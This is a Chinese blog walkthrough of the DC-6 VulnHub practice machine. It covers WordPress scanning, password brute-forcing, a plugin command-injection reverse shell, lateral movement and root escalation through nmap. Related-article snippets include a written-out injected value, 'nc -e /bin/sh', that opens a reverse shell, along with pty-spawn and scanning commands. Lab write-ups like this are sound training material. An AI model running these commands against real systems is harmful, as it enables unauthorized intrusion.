DC-6靶机渗透

最新推荐文章于 2024-07-16 17:01:58 发布
最新推荐文章于 2024-07-16 17:01:58 发布
阅读量630 收藏 2
点赞数
分类专栏: DC 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blackhackerzxcr/article/details/106731356
版权

DC-6靶机渗透

常规扫描,nmap
在这里插入图片描述
wordpree5.11
wpscan扫一下用户,再次之前先把域名解析设置好哟
在这里插入图片描述
保存成username.txt字典,然后cewl 收集一下,做成password字典
在这里插入图片描述爆破无果。然后又用自己的收集的字典,也没成功
然后卡住了,中间也尝试通过账号去爆破ssh,也无果,后面看到作者的提示
利用wordlist内部的字典
在这里插入图片描述注意。第一次用可能会显示没有这个文件,这时候去该目录下,把相应的压缩包解压即可
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200613135519426.png
拿到一个账号登录,后台
发现有这个插件
在这里插入图片描述
在这里插入图片描述以admin来监视后台登录情况
然后搜索该插件漏洞,找到一个csrf+xss,从而执行任意命令执行
后面看了一下poc
在这里插入图片描述
找到存在漏洞的接口,点击CONVERT,然后bp抓包
在这里插入图片描述
加上反弹shell的命令,kali监听4444端口
反弹shell成功
输入
python -c “import pty;pty.spawn(’/bin/bash’)” 进入交互式shell
常规信息收集
在这里插入图片描述
可利用提权没有,然后到家目录下看看其他用户有没有可以利用的,在mark中找到一个账户,然后ssh上去
在此之前,也试过mark用户ssh,没有成功
在这里插入图片描述
发现一个ssh脚本,然后再后面加入反弹shell内容
在这里插入图片描述
在以jens用户身份运行,反弹shell,然后又成功横向到jens用户
在这里插入图片描述
然后发现root权限运行的nmap
写一个脚本
在这里插入图片描述

然后nmap运行,拿到root权限,读取flag.txt
在这里插入图片描述

总结:这里坑点是爆破的字典,也发现一个实质问题,wordpresscms框架本身没有什么太大的安全问题,问题出在插件上面。wpscan这个工具就是扫描存在插件版本,来窥探其漏洞。

0XAXSDD
关注
专栏目录
DC-6 渗透测试
Darklord.W
04-14 1900
DC-6渗透测试 0x00实验环境 靶机DC-6,IP地址:192.168.8.141 测试机:Kali,IP地址:192.168.8.140; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 端口及服务扫描 访问web端 考虑需要添加hosts记录 正常访问 Wpscan扫描站点 wpscan --url...
dc-6靶机渗透笔记
现代鲁滨逊的博客
05-12 198
1.主机发现192.168.174.157 2.nmap扫描 3.访问主站,在那之前和DC2一样,先在/etc/hosts文件加上靶机IP与域名的对应关系,站点看起来和dc2好像有点像,仅凭一点点记忆看看能不能自己攻下 4.用wpscan扫一扫,爆出来用户名 wpscan--url http://wordy/--enumerateu 5. 好的,准备搞一手弱口令爆破。事实是爆破了几个小时都还没出结果,折磨人,难道是姿势不对??应该是字典不够强大。一顿乱搞之后,我还是去翻了翻别...
DC6-靶机渗透
banacyo14206的博客
08-22 552
靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( ...
DC-6靶机渗透学习记录
最新发布
tyut_dummy的博客
07-16 1309
7.用bp抓包一下,在bp中输入baidu.com | nc -e /bin/sh 192.168.6.137 7878进行反弹shell,同时在kali中监听7878端口。6.在ID or integer的输入框中输入一个网站地址,如:baidu.com,然后点击Lookup,发现有回显。`--detection-mode`:设置扫描的侦测模式,如快速、默认或深度。例如:nmap,WPscan,burpsuite,dirb等等。得到admin,mark,graham,sarah,jens几个用户名。
渗透测试:DC-6靶机
Ciyaso的博客
08-21 298
一、扫描获取靶机ip arp-scan -l 192.168.203.145 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.145 开放了22、80端口 访问主页,发现访问不了,和DC-2一样存在重定向,需要修改hosts文件 成功访问 2.Wappaloyzer CMS:WordPress 操作系统:Debian 数据库:Mysql Web服务器:Apache 2.4.25 3.wpscan 由于使用的是WordPress,所以我们使用wpsacn进行扫描
dc-6 靶机渗透学习
..
03-21 1739
信息收集 扫描当前网段,确定存活主机 nmap -sP 192.168.202.0/24 对靶机进行端口扫描,发现80、22端口开放 nmap -A -p- -v 192.168.202.145 访问80端口,发现和dc-2一样的问题,会自动跳转到域名,需要手动在hosts文件加入ip对应关系。 修改后重新访问80端口,用Wappalyzer扫描一下框架,发现是WordPress 根据靶机作者的提示,大致就知道是通过爆破来做 用专门的CM...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-9 靶机渗透
Rex_Surprise的博客
05-10 357
DC-9 靶机渗透 1. 渗透过程 THE_END! DC-9 靶机渗透1. 渗透过程 初期脚本扫描 扫描结果 可以发现 ip地址为:192.168.0.114 ssh (但是ssh无法访问了) 和 http服务s 但是没有其他可用的信息 爆破一下目录 我这里用御剑爆破 输入url: http://192.168.0.114...
DC-6靶机渗透测试
Liumx0105的博客
12-20 882
hosts定向 wpscan枚举账号(因为是WordPress博客) wpscan账号密码爆破 dirb目录扫描得到后台登录地址 searchsploit搜索Activity monitor插件的相关漏洞,得到漏洞利用文件 运行漏洞利用文件,得到反弹shell 打开交互模式 python -c 'import pty;pty.spawn("/bin/bash")' 进入到home目录查看DC-6的用户目录 发现graham账号的密码,进行ssh登录成功 使用sudo -l查看权限 利用命
DC-1靶机渗透笔记
qq_60600840的博客
08-08 223
DC-1靶机、安全、渗透靶机
DC6-靶机
Au
10-30 1682
下载地址 下面是作者的提示,和爆破的字典有关 cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 配置的环境: kali:192.168.25.131 DC6-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/...
DC-6靶机渗透实战笔记
qq_43571759的博客
04-06 489
DC-6渗透笔记 DC-6和DC-2比较相似,前面比较类似,CMS都是wordpress并且都需要使用爆破手段 首先还是信息收集 这里开放80端口以及22端口,我看到这心想肯定又是需要爆破了 首先进入网站还是会和DC-2 一样的毛病,都是重设hosts文件才能进入网站 主页也并没有什么有用的消息,突破点肯定也只有这个界面以及22端口号了 网站构造都和DC-2差不多我在想是不是默认后台登录地...
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 820
DC-6靶机详细渗透过程
DC-6主机渗透
weixin_65920814的博客
05-30 174
以上就是详细介绍的DC-6主机渗透测试的全部内容。
DC-6靶机实战
qq_43462485的博客
10-30 493
DC-6靶机实战 攻击机:kali 192.168.80.130 目标机: dc-6 192.168.80.129 一、信息收集 1.使用arp-scan -l进行主机发现然后使用nmap扫描端口信息 2.访问网站发现无法解析域名,构建一个curl测试访问,发现域名是wordy添加一下 3.访问成功后发现是典型的wordpress网站,使用wpscan扫描一下 发现了几个用户名 4.使用cewl生成字典爆破失败,查看官网提示https://www.vulnhub.com/en
DC-6靶机测试渗透详细教程
wwxxss
10-26 1316
DC-6的靶场详细渗透过程
DC-6靶机
weixin_45778886的博客
03-21 4212
环境搭建 下载链接:http://www.five86.com/downloads/DC-6.zip 解压用VMware打开
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0XAXSDD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值